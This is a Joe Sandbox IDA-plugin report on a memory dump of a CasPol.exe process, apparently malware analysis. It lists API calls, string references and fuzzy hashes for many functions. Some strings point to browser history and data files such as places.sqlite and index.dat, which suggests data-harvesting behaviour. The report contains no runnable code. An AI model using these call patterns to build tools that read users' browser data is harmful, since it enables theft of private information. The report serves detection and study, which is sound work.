                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                                                    • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                                                                      • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 966727022-0
                                                                                                                                                                                                                    • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                                    • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1979745280-0
                                                                                                                                                                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                                                                                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                                                    • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1023896661-0
                                                                                                                                                                                                                    • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                                    • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
